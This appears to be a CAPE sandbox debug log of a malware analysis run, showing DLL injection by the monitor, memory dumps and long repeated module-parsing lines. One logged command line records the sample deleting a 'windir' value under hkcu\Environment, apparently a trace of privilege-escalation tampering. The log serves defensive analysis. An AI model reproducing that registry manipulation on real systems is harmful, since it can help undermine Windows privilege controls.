2020-03-24 10:13:33,885 [root] DEBUG: Adding module to module list: kernel32.dll
2020-03-24 10:13:33,885 [root] DEBUG: Adding module to module list: KernelBase.dll
2020-03-24 10:13:33,885 [root] DEBUG: Adding module to module list: kernel32.dll
2020-03-24 10:13:33,885 [root] DEBUG: Adding module to module list: KernelBase.dll
2020-03-24 10:13:33,885 [root] DEBUG: Adding module to module list: kernel32.dll
2020-03-24 10:13:33,885 [root] DEBUG: Adding module to module list: ntdll.dll
2020-03-24 10:13:33,885 [root] DEBUG: Adding module to module list: KernelBase.dll
2020-03-24 10:13:33,901 [root] DEBUG: Adding module to module list: kernel32.dll
2020-03-24 10:13:33,901 [root] DEBUG: Adding module to module list: oleaut32.dll
2020-03-24 10:13:33,901 [root] DEBUG: Adding module to module list: shlwapi.dll
2020-03-24 10:13:33,901 [root] DEBUG: Adding module to module list: user32.dll
2020-03-24 10:13:33,901 [root] DEBUG: Adding module to module list: ktmw32.dll
2020-03-24 10:13:33,901 [root] DEBUG: Adding module to module list: msvcrt.dll
2020-03-24 10:13:33,901 [root] DEBUG: Adding module to module list: advapi32.dll
2020-03-24 10:13:33,901 [root] DEBUG: Adding module to module list: ntdll.dll
2020-03-24 10:13:33,901 [root] DEBUG: Adding module to module list: ole32.dll
2020-03-24 10:13:33,901 [root] DEBUG: Warning - IAT is not inside the PE image, requires rebasing.
2020-03-24 10:13:33,917 [root] DEBUG: Invalid PE file: import table rebuild failed.
2020-03-24 10:13:33,917 [root] DEBUG: Import table rebuild failed, falling back to unfixed dump.
2020-03-24 10:13:33,917 [root] INFO: Added new CAPE file to list with path: C:\uGrmFZ\CAPE\2212_137784774453132024232020
2020-03-24 10:13:35,898 [root] DEBUG: DoProcessDump: Full process memory dump saved to file: C:\uGrmFZ\memory\2212.dmp.
2020-03-24 10:13:35,898 [root] DEBUG: DLL unloaded from 0x75140000.
2020-03-24 10:13:35,898 [root] DEBUG: DLL unloaded from 0x74340000.
2020-03-24 10:13:35,898 [root] INFO: Notified of termination of process with pid 2212.
2020-03-24 10:13:35,914 [root] INFO: Announced 32-bit process name: reg.exe pid: 2192
2020-03-24 10:13:35,914 [lib.api.process] INFO: Option 'procmemdump' with value '1' sent to monitor
2020-03-24 10:13:35,914 [lib.api.process] INFO: Option 'import_reconstruction' with value '1' sent to monitor
2020-03-24 10:13:35,914 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2020-03-24 10:13:35,914 [lib.api.process] INFO: 32-bit DLL to inject is C:\lwhhhat\dll\vPbvFKVS.dll, loader C:\lwhhhat\bin\RjSTiJo.exe
2020-03-24 10:13:35,930 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\pOpDnJNJHI.
2020-03-24 10:13:35,930 [root] DEBUG: Loader: Injecting process 2192 (thread 2896) with C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:35,930 [root] DEBUG: Process image base: 0x00B90000
2020-03-24 10:13:35,930 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:35,944 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-03-24 10:13:35,944 [root] DEBUG: Successfully injected DLL C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:35,944 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2192
2020-03-24 10:13:35,960 [root] INFO: Announced 32-bit process name: reg.exe pid: 2192
2020-03-24 10:13:35,960 [lib.api.process] INFO: Option 'procmemdump' with value '1' sent to monitor
2020-03-24 10:13:35,960 [lib.api.process] INFO: Option 'import_reconstruction' with value '1' sent to monitor
2020-03-24 10:13:35,960 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2020-03-24 10:13:35,960 [lib.api.process] INFO: 32-bit DLL to inject is C:\lwhhhat\dll\vPbvFKVS.dll, loader C:\lwhhhat\bin\RjSTiJo.exe
2020-03-24 10:13:35,976 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\pOpDnJNJHI.
2020-03-24 10:13:35,976 [root] DEBUG: Loader: Injecting process 2192 (thread 2896) with C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:35,976 [root] DEBUG: Process image base: 0x00B90000
2020-03-24 10:13:35,976 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:35,992 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-03-24 10:13:35,992 [root] DEBUG: Successfully injected DLL C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:35,992 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2192
2020-03-24 10:13:35,992 [root] DEBUG: Terminate processes on terminate_event enabled.
2020-03-24 10:13:35,992 [root] DEBUG: Full process memory dumps enabled.
2020-03-24 10:13:36,007 [root] DEBUG: Import reconstruction of process dumps enabled.
2020-03-24 10:13:36,007 [root] DEBUG: Process dumps enabled.
2020-03-24 10:13:36,007 [root] INFO: Disabling sleep skipping.
2020-03-24 10:13:36,007 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-03-24 10:13:36,023 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 2192 at 0x74880000, image base 0xb90000, stack from 0x256000-0x260000
2020-03-24 10:13:36,023 [root] DEBUG: Commandline: C:\Users\Public\reg  delete hkcu\Environment \v windir \f.
2020-03-24 10:13:36,023 [root] INFO: Added new process to list with pid: 2192
2020-03-24 10:13:36,023 [root] INFO: Monitor successfully loaded in process with pid 2192.
2020-03-24 10:13:36,023 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 2192
2020-03-24 10:13:36,039 [root] DEBUG: GetHookCallerBase: thread 2896 (handle 0x0), return address 0x00B91CAD, allocation base 0x00B90000.
2020-03-24 10:13:36,039 [root] DEBUG: DoProcessDump: Created dump file for full process memory dump: C:\uGrmFZ\memory\2192.dmp.
2020-03-24 10:13:36,039 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x00B90000.
2020-03-24 10:13:36,039 [root] DEBUG: ApiReader: module list size: 20
2020-03-24 10:13:36,039 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,053 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,053 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,053 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,053 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,053 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,053 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,069 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,069 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,069 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,069 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,085 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,085 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,085 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,085 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,085 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,085 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,101 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,101 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,101 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,101 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,101 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,101 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,117 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,117 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,117 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,117 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,117 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,117 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,131 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,131 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,131 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,131 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,131 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,148 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,148 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,148 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,148 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,148 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,148 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,148 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,164 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,164 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,164 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,164 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,164 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,164 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,164 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,178 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,178 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,178 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,178 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,178 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,178 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,178 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,178 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,194 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,194 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,194 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,194 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,194 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,194 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,194 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,210 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,210 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,210 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,210 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,210 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,210 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,210 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,210 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,226 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\KernelBase.dll
2020-03-24 10:13:36,226 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\KernelBase.dll
2020-03-24 10:13:36,226 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,226 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,226 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,226 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,226 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,242 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,242 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,242 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,242 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,242 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,242 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,242 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,242 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,256 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,256 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,256 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,256 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,256 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,256 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,256 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,273 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,273 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,273 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,273 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,273 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,273 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,273 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,273 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,273 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,288 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,288 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,288 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,288 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,288 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,288 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,288 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,288 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,303 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,303 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,303 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,303 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,303 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,303 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,303 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,303 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,319 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,319 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,319 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,319 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,319 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,319 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,319 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,319 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,335 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,335 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,335 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,335 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,335 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,335 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,351 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:36,351 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:36,351 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\lpk.dll
2020-03-24 10:13:36,351 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\lpk.dll
2020-03-24 10:13:36,351 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\usp10.dll
2020-03-24 10:13:36,351 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\usp10.dll
2020-03-24 10:13:36,351 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\msvcrt.dll
2020-03-24 10:13:36,365 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\msvcrt.dll
2020-03-24 10:13:36,365 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\advapi32.dll
2020-03-24 10:13:36,365 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\advapi32.dll
2020-03-24 10:13:36,365 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,365 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,365 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,365 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\KernelBase.dll
2020-03-24 10:13:36,381 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,381 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,381 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,381 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,381 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,381 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,381 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,398 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,398 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,398 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,398 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,398 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
